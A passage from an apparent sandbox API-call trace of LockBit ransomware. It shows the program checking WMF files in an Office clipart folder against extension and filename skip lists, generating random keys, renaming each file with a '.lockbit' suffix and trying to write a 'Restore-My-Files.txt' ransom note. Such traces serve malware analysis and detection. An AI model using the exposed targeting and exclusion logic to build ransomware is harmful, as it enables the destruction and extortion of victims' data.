lpString2=".WMF") returned 1 [0141.969] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0141.969] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0141.969] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0141.969] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0141.969] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0141.969] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0141.969] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0141.969] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0141.969] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0141.969] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0141.969] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0141.969] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0141.969] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0141.970] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0141.970] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0141.970] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0141.970] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0141.970] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0141.970] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0141.970] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0141.970] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0141.970] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0141.970] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0141.970] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0141.970] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0141.970] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0141.970] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107492.WMF.lockbit") returned 72 [0141.970] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107492.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107492.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0141.976] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0141.976] malloc (_Size=0x40068) returned 0x1ff1e60 [0141.976] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=6860) returned 1 [0141.976] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.976] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.976] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0141.976] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.976] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.976] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0141.977] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0141.979] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107492.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107492.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0141.979] malloc (_Size=0xa6) returned 0x77d7a8 [0141.979] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0141.980] free (_Block=0x77d7a8) [0141.980] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107492.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0141.980] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0141.980] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0141.981] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65eb5050, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1918, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0107494.WMF", cAlternateFileName="")) returned 1 [0141.981] lstrcmpiW (lpString1=".", lpString2="J0107494.WMF") returned -1 [0141.981] lstrcmpiW (lpString1="..", lpString2="J0107494.WMF") returned -1 [0141.981] PathFindExtensionW (pszPath="J0107494.WMF") returned=".WMF" [0141.981] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0141.981] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0141.981] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0141.981] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0141.981] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0141.981] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0141.981] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0141.981] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0141.981] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0141.981] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0141.981] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0141.981] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0141.981] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0141.981] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0141.981] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0141.981] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0141.982] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0141.982] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0141.982] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0141.982] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0141.982] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0141.982] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0141.982] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0141.982] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0141.982] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0141.982] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0141.982] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0141.982] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0141.982] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0141.982] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0141.982] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0141.982] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0141.982] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0141.982] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0141.982] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0141.983] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0141.983] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0141.983] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0141.983] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0141.983] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0141.983] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0141.983] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0141.983] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0141.983] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0141.983] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0141.983] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0141.983] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0141.983] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0107494.WMF") returned 1 [0141.983] lstrcmpiW (lpString1="ntldr", lpString2="J0107494.WMF") returned 1 [0141.983] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0107494.WMF") returned 1 [0141.983] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0107494.WMF") returned -1 [0141.983] lstrcmpiW (lpString1="autorun.inf", lpString2="J0107494.WMF") returned -1 [0141.983] lstrcmpiW (lpString1="thumbs.db", lpString2="J0107494.WMF") returned 1 [0141.983] lstrcmpiW (lpString1="iconcache.db", lpString2="J0107494.WMF") returned -1 [0141.983] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0141.983] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107494.WMF") returned=".WMF" [0141.983] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0141.983] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0141.983] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0141.983] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0141.984] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0141.984] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0141.984] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0141.984] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0141.984] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0141.984] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0141.984] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0141.984] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0141.984] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0141.984] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0141.984] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0141.984] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0141.984] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0141.984] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0141.984] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0141.984] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0141.984] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0141.984] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0141.984] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0141.984] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0141.984] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0141.984] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0141.984] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0141.984] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0141.984] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107494.WMF.lockbit") returned 72 [0141.985] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107494.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107494.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xec [0141.985] CreateIoCompletionPort (FileHandle=0xec, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0141.985] malloc (_Size=0x40068) returned 0x3d70450 [0141.985] GetFileSizeEx (in: hFile=0xec, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=6424) returned 1 [0141.985] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.986] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.986] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0141.986] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.986] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.986] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0141.986] ReadFile (in: hFile=0xec, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0141.990] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107494.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107494.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0141.990] malloc (_Size=0xa6) returned 0x77d7a8 [0141.990] NtSetInformationFile (FileHandle=0xec, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0141.991] free (_Block=0x77d7a8) [0141.991] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107494.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0141.991] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0141.991] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0141.992] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x563ba0b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x22a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0107496.WMF", cAlternateFileName="")) returned 1 [0141.992] lstrcmpiW (lpString1=".", lpString2="J0107496.WMF") returned -1 [0141.992] lstrcmpiW (lpString1="..", lpString2="J0107496.WMF") returned -1 [0141.992] PathFindExtensionW (pszPath="J0107496.WMF") returned=".WMF" [0141.992] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0141.992] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0141.992] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0141.992] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0141.992] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0141.992] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0141.992] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0141.992] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0141.992] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0141.992] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0141.992] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0141.992] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0141.992] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0141.992] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0141.992] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0141.992] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0141.992] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0141.992] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0141.992] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0141.992] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0141.992] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0141.992] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0141.993] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0141.993] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0141.993] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0141.993] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0141.993] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0141.993] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0141.993] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0141.993] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0141.993] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0141.993] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0141.993] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0141.993] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0141.993] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0141.993] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0141.993] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0141.993] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0141.993] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0141.993] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0141.993] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0141.993] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0141.993] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0141.993] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0141.993] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0141.993] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0141.993] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0141.993] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0107496.WMF") returned 1 [0141.994] lstrcmpiW (lpString1="ntldr", lpString2="J0107496.WMF") returned 1 [0141.994] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0107496.WMF") returned 1 [0141.994] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0107496.WMF") returned -1 [0141.994] lstrcmpiW (lpString1="autorun.inf", lpString2="J0107496.WMF") returned -1 [0141.994] lstrcmpiW (lpString1="thumbs.db", lpString2="J0107496.WMF") returned 1 [0141.994] lstrcmpiW (lpString1="iconcache.db", lpString2="J0107496.WMF") returned -1 [0141.994] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0141.994] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107496.WMF") returned=".WMF" [0141.994] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0141.994] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0141.994] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0141.994] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0141.994] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0141.994] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0141.994] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0141.994] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0141.994] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0141.994] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0141.994] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0141.994] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0141.994] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0141.994] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0141.994] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0141.994] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0141.994] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0141.995] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0141.995] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0141.995] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0141.995] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0141.995] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0141.995] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0141.995] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0141.995] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0141.995] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0141.995] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0141.995] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0141.995] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107496.WMF.lockbit") returned 72 [0141.995] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107496.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107496.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0141.996] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0141.996] malloc (_Size=0x40068) returned 0x3e70008 [0141.996] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=8864) returned 1 [0141.996] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.996] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.996] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0141.996] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.997] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.997] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0141.997] ReadFile (in: hFile=0x170, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0142.001] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107496.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107496.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0142.001] malloc (_Size=0xa6) returned 0x77d7a8 [0142.001] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0142.002] free (_Block=0x77d7a8) [0142.002] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107496.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0142.002] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0142.002] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0142.002] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x563ba0b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1068, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0107500.WMF", cAlternateFileName="")) returned 1 [0142.002] lstrcmpiW (lpString1=".", lpString2="J0107500.WMF") returned -1 [0142.002] lstrcmpiW (lpString1="..", lpString2="J0107500.WMF") returned -1 [0142.002] PathFindExtensionW (pszPath="J0107500.WMF") returned=".WMF" [0142.002] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0142.002] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0142.002] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0142.002] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0142.002] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0142.002] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0142.002] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0142.002] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0142.002] lstrcmpiW 